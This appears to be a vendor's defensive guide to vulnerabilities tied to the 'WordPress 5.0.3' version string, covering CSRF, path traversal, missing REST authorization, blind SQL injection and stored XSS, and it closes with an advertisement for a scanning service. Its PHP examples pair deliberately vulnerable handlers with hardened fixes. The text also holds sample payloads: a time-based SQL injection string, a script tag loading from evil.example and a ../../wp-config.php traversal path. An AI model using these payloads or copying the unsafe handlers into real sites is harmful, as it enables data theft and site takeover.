WordPress 5.0.3, released in January 2019, is still in use on a small number of sites. The vulnerability databases return 15 CVEs for the version string 5.0.3, three of them rated high. Most of those entries concern plugins and themes whose own version happens to be 5.0.3 (see the table further down); of the items on this page, only the image-cropping issue affects WordPress core itself. A site that still reports 5.0.3, however, has also missed every core security release shipped since then, so it is exposed to far more than this list.
This guide explains each vulnerability in plain language, tells you where to find the version information you need to check whether your site is affected, and describes how to secure the installation. The core version is shown on the Dashboard > Updates screen and is stored in wp-includes/version.php; plugin and theme versions appear on the Plugins and Themes screens and in each plugin's main file header. Whether you are a business owner or a website administrator, knowing which of these flaws applies to you is the first step to fixing them.
WordPress is the world's most popular website platform, powering over 43% of all websites. WordPress 5.0 (December 2018) introduced the block editor, Gutenberg, which changed how content creators build pages; 5.0.3 was a maintenance release that followed in January 2019. WordPress is developed by the open-source WordPress project (Automattic runs WordPress.com but is not WordPress's parent company). The 5.0 branch did receive backported security fixes for years afterwards, delivered by WordPress's automatic background updates, so a site still reporting exactly 5.0.3 has either disabled those updates or had them fail, and lacks every fix in the later 5.0.x releases as well as everything in subsequent major versions.
Think of WordPress versions like your home's security system: newer versions have the latest locks and alarms, while older versions have outdated protections. Attackers do not need to guess which you have: WordPress advertises its version in the generator meta tag, in the ?ver= query string on its scripts and stylesheets, and in readme.html, and scanners match those strings against known, unpatched flaws. With 532 websites still running WordPress 5.0.3, this version remains an attractive target for cybercriminals seeking easy entry points into vulnerable sites.
15 CVEs found. The six most severe are explained below; the remaining nine are listed in the table that follows.
The Superfly Responsive Menu plugin is vulnerable to cross-site request forgery (CSRF): it performs state-changing actions on requests that it never verifies with a nonce. If a logged-in administrator visits a page the attacker controls, that page can submit the request in the administrator's name and the site will carry it out, because the browser attaches the admin's session cookies automatically.
Impact: Attackers could delete menu items, modify site navigation, or perform other administrative actions without your knowledge or consent. The attacker never needs your password; they need an administrator to open a link or page while logged in. This could disrupt your website's functionality and user experience.
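The following is an added example, not code from the Superfly Responsive Menu plugin or from WordPress core. It shows a hypothetical admin-post handler that deletes a menu item, first in the unsafe form the description above refers to and then hardened with the two checks WordPress provides for this: a capability check for authorization and a nonce for request intent. The hook names, nonce action string and option key are assumptions made for the example.

```php
<?php
// Added example, not plugin code. Hypothetical names: action hooks, nonce action,
// and the 'example_menu_items' option are assumptions.

// UNSAFE: any request carrying ?item=N is honoured. A logged-in admin who visits an
// attacker's page containing an auto-submitting form aimed at admin-post.php triggers
// the deletion; the browser sends the admin's cookies, so the site trusts the request.
add_action( 'admin_post_example_delete_menu_item_unsafe', function () {
    $items = get_option( 'example_menu_items', array() );
    unset( $items[ (int) $_REQUEST['item'] ] );
    update_option( 'example_menu_items', $items );
    wp_safe_redirect( admin_url( 'admin.php?page=example-menu' ) );
    exit;
} );

// HARDENED: require a capability (is this user allowed?) AND a nonce bound to the
// specific item (did this user actually intend this request?). Either check alone is
// insufficient: the nonce does not prove permission, the capability does not prove intent.
add_action( 'admin_post_example_delete_menu_item', function () {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    $item = isset( $_REQUEST['item'] ) ? absint( $_REQUEST['item'] ) : 0;

    // Stops with "The link you followed has expired." if _wpnonce is missing or
    // does not match this action string for the current user and session.
    check_admin_referer( 'example_delete_menu_item_' . $item );

    $items = get_option( 'example_menu_items', array() );
    unset( $items[ $item ] );
    update_option( 'example_menu_items', $items );
    wp_safe_redirect( admin_url( 'admin.php?page=example-menu' ) );
    exit;
} );

// The delete link rendered in the admin screen must carry the matching nonce,
// otherwise legitimate clicks fail the check above.
function example_delete_link( $item ) {
    $item = absint( $item );
    $url  = admin_url( 'admin-post.php?action=example_delete_menu_item&item=' . $item );
    return wp_nonce_url( $url, 'example_delete_menu_item_' . $item );
}
```

Handlers registered through wp_ajax_{action} use check_ajax_referer() in the same position. When auditing a plugin, search every admin_post_, wp_ajax_ and admin-page form handler for a check_admin_referer, check_ajax_referer or wp_verify_nonce call; a handler that changes data without one is the pattern described above.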
The MW WP Form plugin deletes a file whose path is taken from the request without checking that it stays inside the directory the plugin is supposed to manage, and the request does not have to come from a logged-in user. A path containing ../ segments walks out of the uploads directory to any file the web server's account can write.
Impact: Files under the web root could be deleted: wp-config.php, .htaccess, uploaded media, or backups stored on the server. Deleting wp-config.php is the classic escalation: WordPress then presents its installation screen, and an attacker who completes it against a database they control ends up with an administrator account on your site. At minimum the site stops working.
The PostX plugin exposes an API endpoint whose request handler never checks whether the caller is logged in or holds the capability the data requires. Anyone who knows the route can call it anonymously and receive data that is otherwise restricted.
Impact: Private content, user information, or business data could be exposed to the public. This could damage your reputation and violate privacy regulations like GDPR.
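An added example, not the PostX plugin's code, of what a missing authorization check on a WordPress REST API route looks like and how it is fixed. The route namespace, handler name and the choice to expose draft posts are assumptions for illustration; the WordPress functions used are real.

```php
<?php
// Added example, not plugin code. 'example/v1', the route paths and the handler
// name are assumptions.

add_action( 'rest_api_init', function () {
    // UNSAFE: '__return_true' makes the route public. An anonymous GET to
    // /wp-json/example/v1/drafts-unsafe returns every draft. Omitting
    // 'permission_callback' entirely has the same effect (and, since WordPress 5.5,
    // also emits a _doing_it_wrong notice).
    register_rest_route( 'example/v1', '/drafts-unsafe', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_list_drafts',
        'permission_callback' => '__return_true',
    ) );

    // HARDENED: the permission callback runs before the handler and must return true
    // or a WP_Error. Tie it to the capability the data actually requires, not merely
    // to "is logged in".
    register_rest_route( 'example/v1', '/drafts', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_list_drafts',
        'permission_callback' => function ( WP_REST_Request $request ) {
            if ( current_user_can( 'edit_others_posts' ) ) {
                return true;
            }
            // 401 for anonymous callers, 403 for authenticated users lacking the capability.
            return new WP_Error(
                'rest_forbidden',
                'You are not allowed to list drafts.',
                array( 'status' => rest_authorization_required_code() )
            );
        },
    ) );
} );

function example_list_drafts( WP_REST_Request $request ) {
    $posts = get_posts( array(
        'post_status' => 'draft',
        'numberposts' => 20,
    ) );
    $out = array();
    foreach ( $posts as $post ) {
        $out[] = array( 'id' => $post->ID, 'title' => $post->post_title );
    }
    return rest_ensure_response( $out );
}
```

To check a live site for this class of issue, request /wp-json/ while logged out: the route index lists every registered namespace and route. Then request each plugin route anonymously; a 200 response carrying data that should be private is the finding, while the hardened version above answers 401.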
WordPress core's image cropping routine (used when editing an image in the media library) does not fully validate the path of the file it writes, so an authenticated user who is allowed to upload images (the Author role and above by default) can make it write the result outside the uploads directory. This is the one item on this page that is fixed by updating WordPress itself rather than a plugin.
Impact: A user with editing access could upload a file that passes as an image but contains PHP code, then use the cropping flaw to place it where the server will execute it, potentially taking control of your website or accessing sensitive data.
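The file-deletion flaw and the image-cropping flaw above share one root cause: a user-influenced path fragment is joined to a base directory and used without proving the result still lies inside that directory. The following added example, which is neither the MW WP Form plugin's nor WordPress core's code, shows a hypothetical "remove uploaded file" handler with the unsafe join next to a containment check that rejects traversal, NUL bytes and symlinks that escape the directory. Function names, the hook and the request parameter are assumptions.

```php
<?php
// Added example, not plugin or core code. Function and hook names and the 'file'
// POST parameter are assumptions.

// UNSAFE: "../../wp-config.php" walks out of the uploads directory and is deleted.
function example_delete_upload_unsafe( $name ) {
    $base = wp_upload_dir()['basedir'];
    @unlink( $base . '/' . $name );
}

// HARDENED: accept only a bare file name, resolve both paths, and require the target
// to sit inside the base directory. Returns true on deletion, false (deleting nothing)
// for anything suspicious.
function example_delete_upload( $name ) {
    $base = realpath( wp_upload_dir()['basedir'] );
    if ( false === $base ) {
        return false;
    }
    // Reject anything that is not a simple file name: directory separators, NUL bytes
    // (which truncate paths in some libraries) and the ".." and "." entries.
    if ( '' === $name
        || $name !== basename( $name )
        || false !== strpos( $name, "\0" )
        || '..' === $name
        || '.' === $name ) {
        return false;
    }
    // realpath() returns false for a missing file and follows symlinks, so a symlink in
    // uploads that points at /etc or wp-config.php fails the prefix test below.
    $target = realpath( $base . DIRECTORY_SEPARATOR . $name );
    if ( false === $target || 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) ) {
        return false;
    }
    if ( ! is_file( $target ) ) {
        return false;
    }
    return unlink( $target );
}

// The calling handler must still authorize and CSRF-check the request; path checking
// alone does not stop an anonymous caller from deleting legitimate uploads. For files
// WordPress tracks as attachments, prefer wp_delete_attachment() over raw unlink().
add_action( 'admin_post_example_delete_upload', function () {
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'example_delete_upload' );
    $name = isset( $_POST['file'] ) ? wp_unslash( $_POST['file'] ) : '';
    $ok   = example_delete_upload( $name );
    wp_safe_redirect( admin_url( 'upload.php?deleted=' . ( $ok ? 1 : 0 ) ) );
    exit;
} );
```

The prefix comparison deliberately includes the trailing separator: comparing against the bare base path would accept a sibling directory such as uploads-old that merely starts with the same characters.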
The LearnDash LMS plugin has a SQL injection flaw in one of its filtering features: request parameters reach a database query without being parameterized. Because the page does not echo query results back directly, the attacker reads data out one yes/no answer or one timing measurement at a time (blind SQL injection). Each individual request looks like an ordinary filter query, so the extraction rarely trips simple alerts.
Impact: Attackers could steal student information, course data, grades, or other sensitive information stored in your learning management system, and, since the database is shared, the WordPress user table including password hashes.
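An added example, not LearnDash's code, of the query pattern the description above refers to and its parameterized form. It shows a hypothetical "filter courses" query; the table suffix, column names and sort options are assumptions. $wpdb->prepare() and $wpdb->esc_like() are the real WordPress APIs for this.

```php
<?php
// Added example, not plugin code. The example_courses table and its columns are assumptions.

// UNSAFE: request values are concatenated into SQL. The attacker needs no error messages:
// a search term such as  a%' AND SLEEP(5) AND '1'='1  turns response time into a
// one-bit oracle, and the rest of the database is read out a character at a time.
function example_filter_courses_unsafe( $search, $orderby ) {
    global $wpdb;
    $sql = "SELECT id, title FROM {$wpdb->prefix}example_courses"
         . " WHERE title LIKE '%" . $search . "%' ORDER BY " . $orderby;
    return $wpdb->get_results( $sql );
}

// HARDENED: values go through placeholders; identifiers go through an allow-list.
// prepare() cannot parameterize a column name, so ORDER BY needs the allow-list.
function example_filter_courses( $search, $orderby = 'title', $limit = 50 ) {
    global $wpdb;

    $allowed_orderby = array( 'title', 'created_at', 'price' );
    if ( ! in_array( $orderby, $allowed_orderby, true ) ) {
        $orderby = 'title';
    }

    // esc_like() escapes the LIKE metacharacters % and _ inside the user's term, so a
    // search for "100%" matches the literal string; we add the wildcards ourselves.
    $like = '%' . $wpdb->esc_like( $search ) . '%';

    // %s is quoted and escaped by prepare(); %d is cast to an integer. $orderby is safe
    // to interpolate only because it was reduced to one of three fixed strings above.
    $sql = $wpdb->prepare(
        "SELECT id, title FROM {$wpdb->prefix}example_courses WHERE title LIKE %s ORDER BY {$orderby} LIMIT %d",
        $like,
        absint( $limit )
    );
    return $wpdb->get_results( $sql );
}
```

On the detection side, the telltale of the blind variant is a burst of requests to a single AJAX action or filter URL whose parameters contain SLEEP, BENCHMARK, SUBSTRING or ASCII and whose response times cluster around a fixed delay.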
The SEOPress plugin allows logged-in users to store unsanitized markup in your site's metadata, which is then printed into every page without escaping (stored cross-site scripting). Note the caveat that applies to every "authenticated stored XSS" finding: on a single-site WordPress install, administrators and editors already hold the unfiltered_html capability and can place script in posts legitimately, so this flaw matters most on multisite installs, on sites that define DISALLOW_UNFILTERED_HTML, or when the vulnerable field is reachable by lower roles.
Impact: Script injected into the metadata runs in the browser of every visitor, potentially stealing visitor information, redirecting users to malicious sites, or damaging your site's reputation.
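An added example, not SEOPress's code, of a per-post "meta description" field written into the page head, first with neither sanitization nor escaping and then hardened. The meta key, field names and nonce action are assumptions; sanitize_text_field(), esc_attr(), wp_verify_nonce() and the save_post and wp_head hooks are real WordPress APIs.

```php
<?php
// Added example, not plugin code. '_example_meta_desc', the form field names and the
// nonce action are assumptions.

// UNSAFE on both sides: raw input is stored and the raw value is printed into the <head>.
// A stored value of  "><script src=//evil.example/x.js></script><meta x="  breaks out of
// the attribute and runs for every visitor.
function example_save_meta_description_unsafe( $post_id ) {
    update_post_meta( $post_id, '_example_meta_desc', $_POST['example_meta_desc'] );
}
function example_print_meta_description_unsafe() {
    echo '<meta name="description" content="'
        . get_post_meta( get_the_ID(), '_example_meta_desc', true ) . '">';
}

// HARDENED: sanitize on save, escape on output. Output escaping is the control that
// actually stops the script from running; sanitizing on save is defence in depth and
// does nothing for values that were stored before the fix.
function example_save_meta_description( $post_id ) {
    if ( ! isset( $_POST['example_meta_desc'], $_POST['example_meta_nonce'] ) ) {
        return;
    }
    if ( ! wp_verify_nonce( $_POST['example_meta_nonce'], 'example_meta_' . $post_id ) ) {
        return;
    }
    if ( ! current_user_can( 'edit_post', $post_id ) ) {
        return;
    }
    // A meta description never legitimately contains markup, so the strictest
    // sanitizer is appropriate: tags, NUL bytes and line breaks are removed.
    $value = sanitize_text_field( wp_unslash( $_POST['example_meta_desc'] ) );
    update_post_meta( $post_id, '_example_meta_desc', $value );
}
add_action( 'save_post', 'example_save_meta_description' );

function example_print_meta_description() {
    $desc = get_post_meta( get_the_ID(), '_example_meta_desc', true );
    if ( '' === $desc ) {
        return;
    }
    // esc_attr() encodes & < > " ' so the value cannot terminate the attribute,
    // whatever was stored.
    echo '<meta name="description" content="' . esc_attr( $desc ) . '">' . "\n";
}
add_action( 'wp_head', 'example_print_meta_description' );
```

Choose the escaping function by output context: esc_attr() inside attributes, esc_html() in element text, esc_url() in href or src, and wp_json_encode() when passing data into inline script.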
The remaining nine CVEs, all rated Medium, are listed below. Each of them refers to a plugin or theme whose own version number is 5.0.3x, not to WordPress core; it applies to your site only if that plugin or theme is installed at the affected version, whatever core version you run.
| CVE ID | Severity | Score | Published | Description |
|---|---|---|---|---|
| CVE-2024-9416 | MEDIUM | 6.4 | 2025-04-03 | The Modula Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bundled FancyBox JavaScript library (versions <= 5.0.36) due to insuffi… |
| CVE-2019-9576 | MEDIUM | 6.1 | 2019-03-05 | The Blog2Social plugin before 5.0.3 for WordPress allows wp-admin/admin.php?page=blog2social-ship XSS. |
| CVE-2015-9377 | MEDIUM | 6.1 | 2019-08-28 | iThemes Builder Theme Depot before 5.0.30 for WordPress has XSS via add_query_arg() and remove_query_arg(). |
| CVE-2023-5348 | MEDIUM | 6.1 | 2023-12-18 | The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthentic… |
| CVE-2025-7711 | MEDIUM | 5.4 | 2025-11-17 | The The Classified Listing – Classified ads & Business Directory Plugin plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5… |
| CVE-2025-11518 | MEDIUM | 5.3 | 2025-10-11 | The WPC Smart Wishlist for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 5.0.3 via several wishlist AJAX… |
| CVE-2023-3225 | MEDIUM | 4.8 | 2023-07-10 | The Float menu WordPress plugin before 5.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site S… |
| CVE-2026-2289 | MEDIUM | 4.4 | 2026-03-04 | The Taskbuilder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 5.0.3 due to insufficient input sanitiza… |
| CVE-2013-3254 | MEDIUM | 4.3 | 2013-05-10 | Cross-site scripting (XSS) vulnerability in wp-admin/admin.php in the WP Photo Album Plus plugin before 5.0.3 for WordPress allows remote attackers to inject arbitrary web script … |
A site reporting WordPress 5.0.3 carries publicly documented vulnerabilities whose details are available to anyone. The three high-risk CVEs alone could allow attackers to delete files from the server, read data out of the database, or inject script into pages served to every visitor. Several of these flaws require no account and no advanced skill: a crafted URL or form submission is enough, which puts them within reach of relatively inexperienced attackers. The fix is the same in every case: update WordPress core to the current release and update or remove every plugin and theme at an affected version.
Don't let your website become another statistic. SiteRecipe.com provides automated WordPress security scanning that identifies vulnerabilities like these in seconds, monitors your site 24/7 for suspicious activity, and alerts you immediately if threats are detected. Our platform takes the guesswork out of WordPress security—simply scan your site today and receive a detailed report showing exactly which CVEs affect your installation and how to fix them. Your website's security is too important to leave to chance.